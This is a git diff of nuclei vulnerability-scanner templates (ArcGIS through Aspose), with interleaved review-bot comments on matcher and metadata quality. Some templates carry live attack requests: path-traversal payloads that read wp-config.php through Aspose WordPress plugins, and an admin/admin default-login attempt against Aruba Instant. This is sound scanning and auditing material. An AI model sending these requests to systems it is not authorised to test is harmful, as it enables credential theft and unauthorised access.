a/nuclei-templates/Other/arcgis-tokens.yaml b/nuclei-templates/Other/arcgis-tokens.yaml index 4067b93031..4f0e54c77a 100644 --- a/nuclei-templates/Other/arcgis-tokens.yaml +++ b/nuclei-templates/Other/arcgis-tokens.yaml @@ -7,6 +7,8 @@ info: description: Check for the existence of the ArcGIS Token Service on an ArcGIS server. reference: - https://enterprise.arcgis.com/en/ + classification: + cpe: cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 
@@ -30,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022064d73cdabe31276ef1cd2782d6906a8a7d2de90f8689fef69e29b855c98752df022100c07126b160bf84f7d071540bccecf623c5178cbc43ac1d87a7dac1cfc36f05d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc6fd4b2661759f0d8c49c40100e6b6356ce67fdb4bbae0e06fc3101280d94bc022100a856fd846055182b53a27be92c797ec8654c12875eb5c24dc4f4e872399fd399:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/archibus-webcentral-panel.yaml b/nuclei-templates/Other/archibus-webcentral-panel.yaml index 1b2bf100cf..de30e0b585 100644 --- a/nuclei-templates/Other/archibus-webcentral-panel.yaml +++ b/nuclei-templates/Other/archibus-webcentral-panel.yaml @@ -9,14 +9,17 @@ info: - https://archibus.com/products/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:a:archibus:web_central:*:*:*:*:*:*:*:* metadata: - verified: true + max-request: 3 + product: web_central shodan-query: http.favicon.hash:889652940 + vendor: archibus + verified: true tags: panel,archibus -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -26,6 +29,7 @@ requests: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -41,5 +45,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/31 +# digest: 480a00453043021f1cbba93982a7f1c97794f66bd60726effad52b19e796a50366f2c2ec0985c9022064cf1708246f9077607c98961aa4245a793af499d6e4440a25555aeb3d772788:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/arcom-malware.yaml b/nuclei-templates/Other/arcom-malware.yaml index a26bb3d29f..8cc32d336f 100644 --- a/nuclei-templates/Other/arcom-malware.yaml +++ b/nuclei-templates/Other/arcom-malware.yaml 
@@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all @@ -25,4 +24,6 @@ file: - type: binary binary: - - "A3242521" \ No newline at end of file + - "A3242521" + +# digest: 4b0a00483046022100c94af5a498c4235c4290fd509d830c181e05b2915d979c951c297aacd1c24f71022100902af9cda3098593dc1e6f28001eecccd32330b65e6f6329d35bf7e48fb757ea:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/arcserve-panel.yaml b/nuclei-templates/Other/arcserve-panel.yaml index 58ac7ccb80..4b8a7cacf1 100644 --- a/nuclei-templates/Other/arcserve-panel.yaml +++ b/nuclei-templates/Other/arcserve-panel.yaml @@ -7,13 +7,15 @@ info: reference: - https://twitter.com/HunterMapping/status/1674267368359444480 - https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe + classification: + cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:* metadata: - verified: true + fofa-query: icon_hash="-1889244460" max-request: 1 - vendor: arcserve product: udp shodan-query: http.favicon.hash:-1889244460 - fofa-query: icon_hash="-1889244460" + vendor: arcserve + verified: true tags: panel,login,arcserve,detect http: @@ -33,4 +35,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200c051923727ed4da25e5bb9062d24632112820760cc42ace377ab172ed66637f02206821597d73341a322e57831efb558156fb2fa2c02c4dc0c70ac23b3a80c99061:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f1e920029ab223d47552ebb51dbe68e974dd8b2d064b34d4c511819d6ef5d04d022100f04b08386868b3f6308d464cf43873c86fe31c3302d64bb19cd4967ccbcf9037:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/ares-rat-c2.yaml b/nuclei-templates/Other/ares-rat-c2.yaml index 8ca7ebdf52..71aa6b7939 100644 --- a/nuclei-templates/Other/ares-rat-c2.yaml +++ b/nuclei-templates/Other/ares-rat-c2.yaml 
@@ -9,9 +9,9 @@ info: reference: - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py metadata: - verified: true max-request: 1 shodan-query: product:'Ares RAT C2' + verified: true tags: c2,ir,osint,ares,panel,rat http: @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207a7e63617d7be81cd8f853fe522d84270bb42a7121463df540c249d80b7eca79022100fd4678816bee7837766b5a4fa98fe1538e8cccfc6e3f9a2d1fbae1e337e94694:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009f391bde1caab637dadd216cedd223a7fcec59ffb58278a87a7a5c88e89f3844022100ad24450fff2f2fcc52d87582f0159aa5ca5f4e3694ffc3f6c63918444eb7d2d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/argo_cd.yaml b/nuclei-templates/Other/argo_cd.yaml new file mode 100644 index 0000000000..12fcda28d3 --- /dev/null +++ b/nuclei-templates/Other/argo_cd.yaml @@ -0,0 +1,20 @@ +id: argo_cd +info: + name: argo_cd + author: cn-kali-team + tags: detect,tech,argo_cd + severity: info + metadata: + product: argo_cd + shodan-query: + - html:"argo cd" + vendor: argoproj + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - argo cd diff --git a/nuclei-templates/Other/argocd-login-534.yaml b/nuclei-templates/Other/argocd-login-534.yaml new file mode 100644 index 0000000000..07b34bdba3 --- /dev/null +++ b/nuclei-templates/Other/argocd-login-534.yaml @@ -0,0 +1,19 @@ +id: argocd-detect + +info: + name: Argo CD Detect + author: Adam Crosser + severity: info + description: Detects the Argo CD website console + tags: tech,argocd + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: body + words: + - 'Argo CD' \ No newline at end of file diff --git a/nuclei-templates/Other/argocd-login.yaml b/nuclei-templates/Other/argocd-login.yaml deleted file mode 100644 index 546bbfd8cc..0000000000 
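Review bot: The word matcher in the new argo_cd.yaml looks for the lowercase string `argo cd`, but nuclei word matching is case-sensitive unless `case-insensitive: true` is set, so a page rendering the product name as "Argo CD" will not match even though the `html:"argo cd"` Shodan query (which is case-insensitive) found it. Add `case-insensitive: true` under the matcher, or match the mixed-case name that argocd-login-534.yaml in this same commit uses. The template also has no status matcher and no `part:`, so any response body mentioning the product is reported; aruba_instant.yaml added later in this chunk has the same shape. Finally, this file and argocd-login-534.yaml both detect Argo CD under different ids (`argo_cd` and `argocd-detect`), so one of the two is redundant.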
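Review bot: The new argocd-login-534.yaml declares `id: argocd-detect`, which does not match its filename, and its only matcher is a bare `Argo CD` word on the body with no `matchers-condition` and no status check, so any page that merely mentions the product matches as readily as a real console. Adding `- type: status` with `- 200` under `matchers-condition: and`, and requesting a path more specific than `{{BaseURL}}`, would make the detection reliable. The file is also written without a trailing newline (`\ No newline at end of file`), unlike the other templates in this patch.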
--- a/nuclei-templates/Other/argocd-login.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: argocd-detect - -info: - name: Argo CD Login Panel - author: Adam Crosser,daffainfo - severity: info - description: An Argo CD login panel was discovered. - reference: - - https://argoproj.github.io/cd/ - classification: - cwe-id: CWE-200 - metadata: - shodan-query: http.title:"Argo CD" - tags: panel,argocd,login,kubernetes - -requests: - - method: GET - path: - - "{{BaseURL}}/login" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '<title>Argo CD' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/arkei-malware.yaml b/nuclei-templates/Other/arkei-malware.yaml index aedc5ee182..3d74fd6ab3 100644 --- a/nuclei-templates/Other/arkei-malware.yaml +++ b/nuclei-templates/Other/arkei-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Arkei.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -20,4 +18,6 @@ file: - '/server/grubConfig' - '\\files\\' - 'SQLite' - condition: and \ No newline at end of file + condition: and + +# digest: 4a0a004730450220521d19ffdc72c12b2e9464f1214ef06c4d2b714414ed036d576636a2bfcb8455022100a6fcba94907d58d6ebf858c11440ccc232b30a950ddb1a3bed2eacebeac1e8e8:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/arl-default-login-537.yaml b/nuclei-templates/Other/arl-default-login-537.yaml index f5dcf2d27b..a7c16e40a9 100644 --- a/nuclei-templates/Other/arl-default-login-537.yaml +++ b/nuclei-templates/Other/arl-default-login-537.yaml 
@@ -1,14 +1,9 @@ id: arl-default-login info: - name: ARL Default Admin Login + name: ARL Default Login author: pikpikcu severity: high - description: An ARL default admin login was discovered. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: arl,default-login requests: @@ -40,5 +35,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/arris-modem-detect.yaml b/nuclei-templates/Other/arris-modem-detect.yaml index 3a9307fcde..85b31d31f7 100644 --- a/nuclei-templates/Other/arris-modem-detect.yaml +++ b/nuclei-templates/Other/arris-modem-detect.yaml @@ -7,14 +7,17 @@ info: description: ARRIS Touchstone Telephony Modem status panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:h:commscope:dg3450:*:*:*:*:*:*:*:* metadata: - verified: true + max-request: 1 + product: dg3450 shodan-query: html:"phy.htm" - tags: panel,arris + vendor: commscope + verified: true + tags: panel,arris,commscope -requests: +http: - method: GET path: - "{{BaseURL}}/phy.htm" @@ -29,5 +32,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/31 +# digest: 4a0a00473045022100dccbca94cbd8601eaf684ba7e8cd9a3c023eb761b8124e6c5491cb03d400e8c402202be17f19304f05c61e103be475a92d1aebf706122dc68b89bfb612b0edadccd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/artica-web-proxy-detect-544.yaml b/nuclei-templates/Other/artica-web-proxy-detect.yaml similarity index 100% rename from nuclei-templates/Other/artica-web-proxy-detect-544.yaml rename to nuclei-templates/Other/artica-web-proxy-detect.yaml diff --git a/nuclei-templates/Other/artifactory-anonymous-deploy.yaml b/nuclei-templates/Other/artifactory-anonymous-deploy.yaml deleted file mode 100644 index 94b3e00db4..0000000000 
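Review bot: After this hunk the `info` block of arl-default-login-537.yaml carries only name, author, severity and tags; there is no `description` of what a positive result means and no `classification`, even though the template stays at `severity: high`. A one-line `description: Checks whether the ARL admin interface accepts its default credentials.` and a `classification:` block with `cwe-id: CWE-522` would keep the high severity explainable to whoever triages the finding. The `requests:` block this hunk ends on continues outside the hunk.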
--- a/nuclei-templates/Other/artifactory-anonymous-deploy.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: artifactory-anonymous-deploy - -info: - name: Artifactory anonymous deploy - author: panch0r3d - severity: high - reference: - - https://www.errno.fr/artifactory/Attacking_Artifactory.html - tags: artifactory - -requests: - - method: GET - path: - - "{{BaseURL}}/artifactory/ui/repodata?deploy=true" - - matchers-condition: and - matchers: - - type: word - words: - - '"repoKey"' - part: body - - - type: status - status: - - 200 - - - type: word - words: - - "application/json" - part: header \ No newline at end of file diff --git a/nuclei-templates/Other/artifactory_deploy.yaml b/nuclei-templates/Other/artifactory_deploy.yaml new file mode 100644 index 0000000000..04c60207c7 --- /dev/null +++ b/nuclei-templates/Other/artifactory_deploy.yaml @@ -0,0 +1,24 @@ +id: artifactory-anonymous-deploy +info: + name: Artifactory anonymous deploy + reference: https://www.errno.fr/artifactory/Attacking_Artifactory.html + author: panch0r3d + severity: high + tags: artifactory +requests: + - method: GET + path: + - "{{BaseURL}}/artifactory/ui/repodata?deploy=true" + matchers-condition: and + matchers: + - type: word + words: + - '"repoKey"' + part: body + - type: status + status: + - 200 + - type: word + words: + - "application/json" + part: header diff --git a/nuclei-templates/Other/aruba-instant-default-login.yaml b/nuclei-templates/Other/aruba-instant-default-login.yaml index 0f317319bf..55b9e832cc 100644 --- a/nuclei-templates/Other/aruba-instant-default-login.yaml +++ b/nuclei-templates/Other/aruba-instant-default-login.yaml 
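Review bot: The new artifactory_deploy.yaml keeps `id: artifactory-anonymous-deploy`, which differs from its filename, and its content is a reformatted copy of the artifactory-anonymous-deploy.yaml deleted just before it, so the net effect is a rename that breaks the id/filename convention the other templates in this patch follow (e.g. `id: aspose-file-download` in aspose-file-download-561.yaml). The `info` block has no `description`; given `severity: high`, a sentence such as `description: The Artifactory deploy UI endpoint answers an unauthenticated request, which indicates anonymous deploy may be enabled.` would tell a triager what the three matchers (`"repoKey"` in the body, status 200, `application/json` in the header) actually establish. The `reference` is now a scalar rather than the list form used elsewhere in this commit (arcserve-panel, ares-rat-c2), which is valid YAML but inconsistent.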
@@ -1,14 +1,18 @@ id: aruba-instant-default-login info: - name: Aruba Instant password vulnerability + name: Aruba Instant - Default Login author: SleepingBag945 - severity: medium + severity: high description: | - Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions.
+ Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions. + reference: + - https://www.192-168-1-1-ip.co/aruba-networks/routers/179/#:~:text=The%20default%20username%20for%20your,control%20panel%20of%20your%20router. metadata: + verified: true + max-request: 1 fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js" - tags: default Password + tags: aruba,default-login http: - raw: @@ -17,11 +21,20 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - opcode=login&user=admin&passwd=admin&refresh=false&nocache=0.17699820340903838 - + opcode=login&user={{username}}&passwd={{password}}&refresh=false&nocache=0.17699820340903838 + attack: pitchfork + payloads: + username: + - admin + password: + - admin + host-redirects: true matchers: - type: dsl dsl: - - 'status_code_1 == 200 && contains(body_1,"sid") && contains(body_1,"Admin")' + - 'status_code_1 == 200' + - 'contains(body_1,"name=\"sid") && contains(body_1,"true\">Admin")' condition: and + +# digest: 4a0a00473045022100ced4e051d16f58cbefe47b2e6d4acfb6f917418ea7694c5248d757815146178f02200e8ff5e2a45e4224bf56d9e4d5a2bb7ec6ea6c15cbf45fcdaf10431d404c9481:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/aruba_instant.yaml b/nuclei-templates/Other/aruba_instant.yaml new file mode 100644 index 0000000000..ae33adf333 --- /dev/null +++ b/nuclei-templates/Other/aruba_instant.yaml 
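Review bot: The `reference` added to aruba-instant-default-login.yaml is a text-fragment (`#:~:text=`) link to a third-party router-password aggregator rather than vendor documentation; text-fragment URLs are brittle and the aggregator page can change or disappear, so a vendor page describing the factory credentials would be a more durable citation. The description is re-emitted unchanged on the new side, which suggests a whitespace-only edit; while it is being touched, `attackers can control the entire platform through the default password admin/admin vulnerability` reads awkwardly and could become `an attacker who knows the default admin/admin credentials can log in with administrator privileges`. The `http:` raw request this hunk ends on continues outside the hunk.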
@@ -0,0 +1,21 @@ +id: aruba_instant +info: + name: aruba_instant + author: cn-kali-team + tags: detect,tech,aruba_instant + severity: info + metadata: + fofa-query: + - body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js" + product: aruba_instant + vendor: arubanetworks + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - jscripts/third_party/highcharts.src.js + - jscripts/third_party/raphael-treemap.min.js diff --git a/nuclei-templates/Other/asana-clientid.yaml b/nuclei-templates/Other/asana-clientid.yaml index 62c4909718..bacc30cfb2 100644 --- a/nuclei-templates/Other/asana-clientid.yaml +++ b/nuclei-templates/Other/asana-clientid.yaml @@ -19,4 +19,5 @@ file: - type: regex part: body regex: - - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) +# digest: 4a0a00473045022100ee80a7c2a35b34bc0d48c69c1e26169ef5a2181505d3836e47974bc04e41fbde0220796c13e9c14005e438971b5e1aa2f241fb1a2736a98df48c1acc98e50b1562b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/asana-clientsecret.yaml b/nuclei-templates/Other/asana-clientsecret.yaml index fa63975189..fed08ffdf1 100644 --- a/nuclei-templates/Other/asana-clientsecret.yaml +++ b/nuclei-templates/Other/asana-clientsecret.yaml 
@@ -19,4 +19,5 @@ file: - type: regex part: body regex: - - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) +# digest: 4b0a00483046022100a61527e5da6fb4b6f5e194679ac675364422d0a7a09fef2ed10c8d3982694d55022100a24d80c553e4d28e07ce752f5ab161faff53f39ea00a37ea4872f3c8564c4f6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/asanhamayesh-cms-lfi.yaml b/nuclei-templates/Other/asanhamayesh-cms-lfi.yaml index 18961552cf..6d47e566f9 100644 --- a/nuclei-templates/Other/asanhamayesh-cms-lfi.yaml +++ b/nuclei-templates/Other/asanhamayesh-cms-lfi.yaml @@ -2,7 +2,7 @@ id: asanhamayesh-cms-lfi info: name: Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability - author: 0x_Akoko + author: imhunterand severity: high reference: https://cxsecurity.com/issue/WLB-2018030006 tags: asanhamayesh,lfi diff --git a/nuclei-templates/Other/asanhamayesh-lfi-553.yaml b/nuclei-templates/Other/asanhamayesh-lfi-552.yaml similarity index 100% rename from nuclei-templates/Other/asanhamayesh-lfi-553.yaml rename to nuclei-templates/Other/asanhamayesh-lfi-552.yaml diff --git a/nuclei-templates/Other/aspcms-backend-panel.yaml b/nuclei-templates/Other/aspcms-backend-panel.yaml index 4afdfd3479..81821166f4 100644 --- a/nuclei-templates/Other/aspcms-backend-panel.yaml +++ b/nuclei-templates/Other/aspcms-backend-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/GREENHAT7/pxplan/blob/main/goby_pocs/Aspcms_Backend_Leak.json metadata: - verified: true - max-request: 2 fofa-query: app="ASPCMS" + max-request: 2 + verified: true tags: panel,login,aspcms,admin http: 
@@ -36,5 +36,4 @@ http: - 'status_code_1 == 200 && contains(body_1,"alert(")' - 'status_code_2 == 200 && contains(body_2,"var txtUserName = document.getElementById(")' condition: and - -# digest: 4a0a0047304502202debdad65506ec15af6fee39811c3fd109cb9f35281bf2cb14d54177fb365814022100dd19eedb73707d20b90846da9a403691acb6f675f896bef496d64ddaa2746803:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e039d5a7adae4d72297ac42094fd0ef69bf43894b8e392c474c653a8ba5f09110220163fad65f1b2a8d7040ca2d3816646e2cd5ca043cdd6b6f52bcd745a5901750d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aspect-control-panel.yaml b/nuclei-templates/Other/aspect-control-panel.yaml index c756fc3181..1ca2d40872 100644 --- a/nuclei-templates/Other/aspect-control-panel.yaml +++ b/nuclei-templates/Other/aspect-control-panel.yaml @@ -8,12 +8,11 @@ info: ASPECT Control Panel login was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true max-request: 1 shodan-query: http.favicon.hash:1011076161 + verified: true tags: panel,aspect,login http: @@ -30,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022063319d61f78c901d63d84b0e550bafea9ab51b6ee1ee2a91d1b18648eac6077b02201728432bf7ad901f9a3ce1a60e2a51d7572b447bfb6b3046be4a662625c067ce:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022003b01b7a0cb3aea69d9387f0308471dc8631a24f86d76679f6b2534af32eb3d0022100a89383c9692a2869bd83300f5e97a97fadf8d6b6f1c3e6e5acedef11e8beb997:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aspnet-version-detect.yaml b/nuclei-templates/Other/aspnet-version-detect.yaml index 58114b8031..0f42a05f22 100644 --- a/nuclei-templates/Other/aspnet-version-detect.yaml +++ b/nuclei-templates/Other/aspnet-version-detect.yaml 
@@ -33,4 +33,4 @@ http: - type: kval kval: - X_AspNet_Version -# digest: 4a0a00473045022100d63d95b999554a10626167cbbe5ad1077e9eeb67d2add6d4afb57a6000527fbc022017389e7f0eaa2599a9dff5531d544530788a80aec345d55c35aa4cd356bc20de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dad22bf762e3dc46dba882804cdf41b02014fea00fe0a951845acbe6c3d138490221008ea9e3a1a77a748ef7e6fc1ef736795b1afc129d64c5751d9733f3734b48682c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aspnetmvc-version-disclosure.yaml b/nuclei-templates/Other/aspnetmvc-version-disclosure.yaml index e106673d3c..c27434415e 100644 --- a/nuclei-templates/Other/aspnetmvc-version-disclosure.yaml +++ b/nuclei-templates/Other/aspnetmvc-version-disclosure.yaml @@ -33,4 +33,4 @@ http: - type: kval kval: - X_AspNetMvc_Version -# digest: 490a00463044022067965e7ff608df90cb8773f5b2df33eee6c179cddc2a207b4af3deab60dc69c5022038fd20ae3487013935ad4c96ab367eaa9f2e4216074c1be8118bb428ebdaa867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100986dc4e365cf66a44c9321b637566896ddb7b44b2fef780afa49a36298679a0902206407bdf1e8076b79feac79addc0a2817fe5c4fd1699238c79459e20708c9f13f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aspose-file-download-561.yaml b/nuclei-templates/Other/aspose-file-download-561.yaml new file mode 100644 index 0000000000..961f6980ff --- /dev/null +++ b/nuclei-templates/Other/aspose-file-download-561.yaml 
@@ -0,0 +1,24 @@ +id: aspose-file-download +info: + name: Wordpress Aspose Cloud eBook Generator - Arbitrary File Retrieval + author: 0x_Akoko + severity: high + description: The Aspose Cloud eBook Generator WordPress plugin is affected by an arbitrary file retrieval vulnerability. + reference: + - https://wpscan.com/vulnerability/7866 + tags: wordpress,wp-plugin,lfi,aspose,ebook +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php' + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aspose-file-download.yaml b/nuclei-templates/Other/aspose-file-download.yaml deleted file mode 100644 index f6b3f7b609..0000000000 --- a/nuclei-templates/Other/aspose-file-download.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: aspose-file-download - -info: - name: Aspose Cloud eBook Generator - File Download - author: 0x_Akoko - severity: high - description: The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability. - reference: https://wpscan.com/vulnerability/7866 - tags: wordpress,wp-plugin,lfi,aspose,ebook - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php' - - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aspose-ie-file-download-562.yaml b/nuclei-templates/Other/aspose-ie-file-download-562.yaml deleted file mode 100644 index 936207f3e6..0000000000 --- a/nuclei-templates/Other/aspose-ie-file-download-562.yaml +++ /dev/null 
@@ -1,25 +0,0 @@ -id: aspose-ie-file-download -info: - name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download - author: 0x_Akoko - severity: high - description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. - reference: - - https://packetstormsecurity.com/files/131162/ - - https://wordpress.org/plugins/aspose-importer-exporter - tags: wordpress,wp-plugin,lfi,aspose -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php' - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aspose-ie-file-download-565.yaml b/nuclei-templates/Other/aspose-ie-file-download-565.yaml new file mode 100644 index 0000000000..095211f5e4 --- /dev/null +++ b/nuclei-templates/Other/aspose-ie-file-download-565.yaml @@ -0,0 +1,29 @@ +id: aspose-ie-file-download + +info: + name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download + author: 0x_Akoko + severity: high + description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + reference: + - https://packetstormsecurity.com/files/131162/ + - https://wordpress.org/plugins/aspose-importer-exporter + tags: wordpress,wp-plugin,lfi,aspose + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aspose-importer-exporter-file-download.yaml b/nuclei-templates/Other/aspose-importer-exporter-file-download.yaml index 0216e21bf1..f252bcf8df 100644 
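Review bot: The new aspose-ie-file-download-565.yaml appears to be the same check as aspose-importer-exporter-file-download.yaml, which this commit also touches: the visible `name` and `description` lines of that file are identical to this one, and the request path here is `/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php`. If the older file's path (outside its hunk) is the same, every affected host is reported twice under two ids. Keep the copy whose file name matches its id (the importer-exporter one) and retire this one, rather than re-adding it with blank lines as the only difference from the deleted 562 copy.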
--- a/nuclei-templates/Other/aspose-importer-exporter-file-download.yaml +++ b/nuclei-templates/Other/aspose-importer-exporter-file-download.yaml @@ -2,7 +2,7 @@ id: aspose-importer-exporter-file-download info: name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download - author: 0x_Akoko + author: imhunterand severity: high description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. reference: diff --git a/nuclei-templates/Other/aspose-pdf-file-download-568.yaml b/nuclei-templates/Other/aspose-pdf-file-download-568.yaml new file mode 100644 index 0000000000..b6062673c9 --- /dev/null +++ b/nuclei-templates/Other/aspose-pdf-file-download-568.yaml @@ -0,0 +1,25 @@ +id: aspose-pdf-file-download +info: + name: WordPress Aspose PDF Exporter File Download + author: 0x_Akoko + severity: high + description: The Aspose.psf Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + reference: + - https://packetstormsecurity.com/files/131161 + - https://wordpress.org/plugins/aspose-pdf-exporter + tags: wordpress,wp-plugin,lfi +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php' + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aspose-pdf-file-download.yaml b/nuclei-templates/Other/aspose-pdf-file-download.yaml deleted file mode 100644 index d10395f6c7..0000000000 --- a/nuclei-templates/Other/aspose-pdf-file-download.yaml +++ /dev/null 
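Review bot: The request path in the new aspose-pdf-file-download-568.yaml, `/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php`, does not correspond to the plugin slug named by the template's own reference (`https://wordpress.org/plugins/aspose-pdf-exporter`); if the plugin installs under its slug at `/wp-content/plugins/aspose-pdf-exporter/`, this path is never the one that is probed, and the `Wordpress/Aaspose-` prefix reads like a copy error inherited from the deleted aspose-pdf-file-download.yaml. The `description` also says `Aspose.psf`, presumably meant to be `Aspose.pdf`. The file being deleted in the same commit carried a `classification:` block (CVSS vector, `cvss-score: 7.5`, `cwe-id: CWE-22`) and the `- Local File Inclusion` naming that this older revision drops, so the swap is a metadata regression as well.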
